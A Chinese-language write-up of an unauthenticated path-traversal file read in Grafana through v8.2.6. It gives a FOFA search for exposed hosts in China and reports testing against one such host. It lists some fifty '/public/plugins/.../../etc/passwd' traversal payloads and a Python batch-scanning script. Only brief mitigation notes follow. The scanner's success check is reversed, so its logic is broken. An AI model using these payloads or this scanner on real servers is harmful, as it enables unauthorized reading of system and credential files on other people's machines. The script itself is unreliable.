漏洞描述 Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
影响范围 经测试,目前最新版本(Grafana v8.2.6)仍存在漏洞。
漏洞成因 主要是插件原因,查看代码是插件目录直接和requestedFile进行合并,没有进行过滤
参考这篇文章:https://mp.weixin.qq.com/s/dqJ3F_fStlj78S0qhQ3Ggw
漏洞复现 FOFA 查询 app="Grafana" && country="CN" && body="v8."
在fofa上面找的一个ip进行测试,只需要简单抓包,将路径改掉,就可以读取文件内容:
Fuzz些插件列表 /public/plugins/alertGroups/../../../../../../../../etc/passwd /public/plugins/alertlist/../../../../../../../../etc/passwd /public/plugins/alertmanager/../../../../../../../../etc/passwd /public/plugins/annolist/../../../../../../../../etc/passwd /public/plugins/barchart/../../../../../../../../etc/passwd /public/plugins/bargauge/../../../../../../../../etc/passwd /public/plugins/canvas/../../../../../../../../etc/passwd /public/plugins/cloudwatch/../../../../../../../../etc/passwd /public/plugins/dashboard/../../../../../../../../etc/passwd /public/plugins/dashlist/../../../../../../../../etc/passwd /public/plugins/debug/../../../../../../../../etc/passwd /public/plugins/elasticsearch/../../../../../../../../etc/passwd /public/plugins/gauge/../../../../../../../../etc/passwd /public/plugins/geomap/../../../../../../../../etc/passwd /public/plugins/gettingstarted/../../../../../../../../etc/passwd /public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd /public/plugins/grafana/../../../../../../../../etc/passwd /public/plugins/graph/../../../../../../../../etc/passwd /public/plugins/graphite/../../../../../../../../etc/passwd /public/plugins/heatmap/../../../../../../../../etc/passwd /public/plugins/histogram/../../../../../../../../etc/passwd /public/plugins/influxdb/../../../../../../../../etc/passwd /public/plugins/jaeger/../../../../../../../../etc/passwd /public/plugins/live/../../../../../../../../etc/passwd /public/plugins/logs/../../../../../../../../etc/passwd /public/plugins/loki/../../../../../../../../etc/passwd /public/plugins/mixed/../../../../../../../../etc/passwd /public/plugins/mssql/../../../../../../../../etc/passwd /public/plugins/mysql/../../../../../../../../etc/passwd /public/plugins/news/../../../../../../../../etc/passwd /public/plugins/nodeGraph/../../../../../../../../etc/passwd /public/plugins/opentsdb/../../../../../../../../etc/passwd /public/plugins/piechart/../../../../../../../../etc/passwd /public/plugins/pluginlist/../../../../../../../../etc/passwd /public/plugins/postgres/../../../../../../../../etc/passwd /public/plugins/prometheus/../../../../../../../../etc/passwd /public/plugins/stat/../../../../../../../../etc/passwd /public/plugins/state-timeline/../../../../../../../../etc/passwd /public/plugins/status-history/../../../../../../../../etc/passwd /public/plugins/table-old/../../../../../../../../etc/passwd /public/plugins/table/../../../../../../../../etc/passwd /public/plugins/tempo/../../../../../../../../etc/passwd /public/plugins/testdata/../../../../../../../../etc/passwd /public/plugins/text/../../../../../../../../etc/passwd /public/plugins/timeseries/../../../../../../../../etc/passwd /public/plugins/welcome/../../../../../../../../etc/passwd /public/plugins/xychart/../../../../../../../../etc/passwd /public/plugins/zipkin/../../../../../../../../etc/passwd
alertmanager grafana loki postgres grafana-azure-monitor-datasource mixed prometheus cloudwatch graphite mssql tempo dashboard influxdb mysql testdata elasticsearch jaeger opentsdb zipkin alertGroups bargauge debug graph live piechart status-history timeseries alertlist candlestick gauge heatmap logs pluginlist table welcome annolist canvas geomap histogram news stat table-old xychart barchart dashlist gettingstarted icon nodeGraph state-timeline text
脚本 import requestsimport sys args = str (sys.argv[1 ]) headers = { "User-Agent" :"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" , } with open ("./paload.txt" , "r+" ) as f: for line in f: url = "http://" +args+"/public/plugins/" +str .rstrip(line)+"/../../../../../../../../../../../etc/passwd" req = requests.post(url, headers=headers,timeout=(3 ,7 ),allow_redirects=False ) a=req.text str1='root' if a in str1: print ('确认存在' +str .rstrip(line)+'路径,并存在漏洞!' ) print (url) else : print ('不存在漏洞!' )
脚本改进:多线程+批量url检测
漏洞分析 暂未进行
参考:https://mp.weixin.qq.com/s/dqJ3F_fStlj78S0qhQ3Ggw
修复建议 请关注厂商主页更新:Grafana: The open observability platform | Grafana Labs
临时修复建议:
1、通过防火墙等安全设备设置访问策略,设置白名单访问。
2、如非必要,禁止公网访问该系统。
